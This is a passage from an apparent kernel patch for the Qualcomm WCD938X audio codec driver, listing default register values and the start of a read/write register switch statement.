++	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
++	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
++	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
++	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
++	{WCD938X_CLASSH_SPARE,                                 0x00},
++	{WCD938X_FLYBACK_EN,                                   0x4E},
++	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
++	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
++	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
++	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
++	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
++	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
++	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
++	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
++	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
++	{WCD938X_FLYBACK_CTRL_1,                               0x65},
++	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
++	{WCD938X_RX_AUX_SW_CTL,                                0x00},
++	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
++	{WCD938X_RX_TIMER_DIV,                                 0x32},
++	{WCD938X_RX_OCP_CTL,                                   0x1F},
++	{WCD938X_RX_OCP_COUNT,                                 0x77},
++	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
++	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
++	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
++	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
++	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
++	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
++	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
++	{WCD938X_RX_BIAS_MISC,                                 0x00},
++	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
++	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
++	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
++	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
++	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
++	{WCD938X_HPH_L_STATUS,                                 0x04},
++	{WCD938X_HPH_R_STATUS,                                 0x04},
++	{WCD938X_HPH_CNP_EN,                                   0x80},
++	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
++	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
++	{WCD938X_HPH_OCP_CTL,                                  0x28},
++	{WCD938X_HPH_AUTO_CHOP,                                0x16},
++	{WCD938X_HPH_CHOP_CTL,                                 0x83},
++	{WCD938X_HPH_PA_CTL1,                                  0x46},
++	{WCD938X_HPH_PA_CTL2,                                  0x50},
++	{WCD938X_HPH_L_EN,                                     0x80},
++	{WCD938X_HPH_L_TEST,                                   0xE0},
++	{WCD938X_HPH_L_ATEST,                                  0x50},
++	{WCD938X_HPH_R_EN,                                     0x80},
++	{WCD938X_HPH_R_TEST,                                   0xE0},
++	{WCD938X_HPH_R_ATEST,                                  0x54},
++	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
++	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
++	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
++	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
++	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
++	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
++	{WCD938X_HPH_L_DAC_CTL,                                0x20},
++	{WCD938X_HPH_R_DAC_CTL,                                0x20},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
++	{WCD938X_EAR_EAR_EN_REG,                               0x22},
++	{WCD938X_EAR_EAR_PA_CON,                               0x44},
++	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
++	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
++	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
++	{WCD938X_EAR_TEST_CTL,                                 0x00},
++	{WCD938X_EAR_STATUS_REG_1,                             0x00},
++	{WCD938X_EAR_STATUS_REG_2,                             0x08},
++	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
++	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
++	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
++	{WCD938X_SLEEP_CTL,                                    0x16},
++	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
++	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
++	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
++	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
++	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
++	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
++	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
++	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
++	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
++	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
++	{WCD938X_AUX_AUXPA,                                    0x00},
++	{WCD938X_LDORXTX_MODE,                                 0x0C},
++	{WCD938X_LDORXTX_CONFIG,                               0x10},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
++	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
++	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
++	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
++	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
++	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
++	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
++	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
++	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
++	{WCD938X_AUX_INT_EN_REG,                               0x00},
++	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
++	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
++	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
++	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
++	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
++	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
++	{WCD938X_AUX_INT_MISC,                                 0x00},
++	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
++	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
++	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
++	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
++	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
++	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
++	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
++	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
++	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
++	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
++	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
++	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
++	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
++	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
++	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
++	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
++	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
++	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
++	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
++	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
++	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
++	{WCD938X_DIGITAL_CDC_RST,                              0x00},
++	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
++	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
++	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
++	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
++	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
++	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
++	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
++	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
++	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
++	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
++	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
++	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
++	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
++	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
++	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
++	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
++	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
++	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
++	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
++	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
++	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
++	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_SPARE_0,                              0x00},
++	{WCD938X_DIGITAL_SPARE_1,                              0x00},
++	{WCD938X_DIGITAL_SPARE_2,                              0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
++	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
++	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
++	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
++};
++
++static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_PAGE_REGISTER:
++	case WCD938X_ANA_BIAS:
++	case WCD938X_ANA_RX_SUPPLIES:
++	case WCD938X_ANA_HPH:
++	case WCD938X_ANA_EAR:
++	case WCD938X_ANA_EAR_COMPANDER_CTL:
++	case WCD938X_ANA_TX_CH1:
++	case WCD938X_ANA_TX_CH2:
++	case WCD938X_ANA_TX_CH3:
++	case WCD938X_ANA_TX_CH4:
++	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
++	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
++	case WCD938X_ANA_MBHC_MECH:
++	case WCD938X_ANA_MBHC_ELECT:
++	case WCD938X_ANA_MBHC_ZDET:
++	case WCD938X_ANA_MBHC_BTN0:
++	case WCD938X_ANA_MBHC_BTN1:
++	case WCD938X_ANA_MBHC_BTN2:
++	case WCD938X_ANA_MBHC_BTN3:
++	case WCD938X_ANA_MBHC_BTN4:
++	case WCD938X_ANA_MBHC_BTN5:
++	case WCD938X_ANA_MBHC_BTN6:
++	case WCD938X_ANA_MBHC_BTN7:
++	case WCD938X_ANA_MICB1:
++	case WCD938X_ANA_MICB2:
++	case WCD938X_ANA_MICB2_RAMP:
++	case WCD938X_ANA_MICB3:
++	case WCD938X_ANA_MICB4:
++	case WCD938X_BIAS_CTL:
++	case WCD938X_BIAS_VBG_FINE_ADJ:
++	case WCD938X_LDOL_VDDCX_ADJUST:
++	case WCD938X_LDOL_DISABLE_LDOL:
++	case WCD938X_MBHC_CTL_CLK:
++	case WCD938X_MBHC_CTL_ANA:
++	case WCD938X_MBHC_CTL_SPARE_1:
++	case WCD938X_MBHC_CTL_SPARE_2:
++	case WCD938X_MBHC_CTL_BCS:
++	case WCD938X_MBHC_TEST_CTL:
++	case WCD938X_LDOH_MODE:
++	case WCD938X_LDOH_BIAS:
++	case WCD938X_LDOH_STB_LOADS:
++	case WCD938X_LDOH_SLOWRAMP:
++	case WCD938X_MICB1_TEST_CTL_1:
++	case WCD938X_MICB1_TEST_CTL_2:
++	case WCD938X_MICB1_TEST_CTL_3:
++	case WCD938X_MICB2_TEST_CTL_1:
++	case WCD938X_MICB2_TEST_CTL_2:
++	case WCD938X_MICB2_TEST_CTL_3:
++	case WCD938X_MICB3_TEST_CTL_1:
++	case WCD938X_MICB3_TEST_CTL_2:
++	case WCD938X_MICB3_TEST_CTL_3:
++	case WCD938X_MICB4_TEST_CTL_1:
++	case WCD938X_MICB4_TEST_CTL_2:
++	case WCD938X_MICB4_TEST_CTL_3:
++	case WCD938X_TX_COM_ADC_VCM:
++	case WCD938X_TX_COM_BIAS_ATEST:
++	case WCD938X_TX_COM_SPARE1:
++	case WCD938X_TX_COM_SPARE2:
++	case WCD938X_TX_COM_TXFE_DIV_CTL:
++	case WCD938X_TX_COM_TXFE_DIV_START:
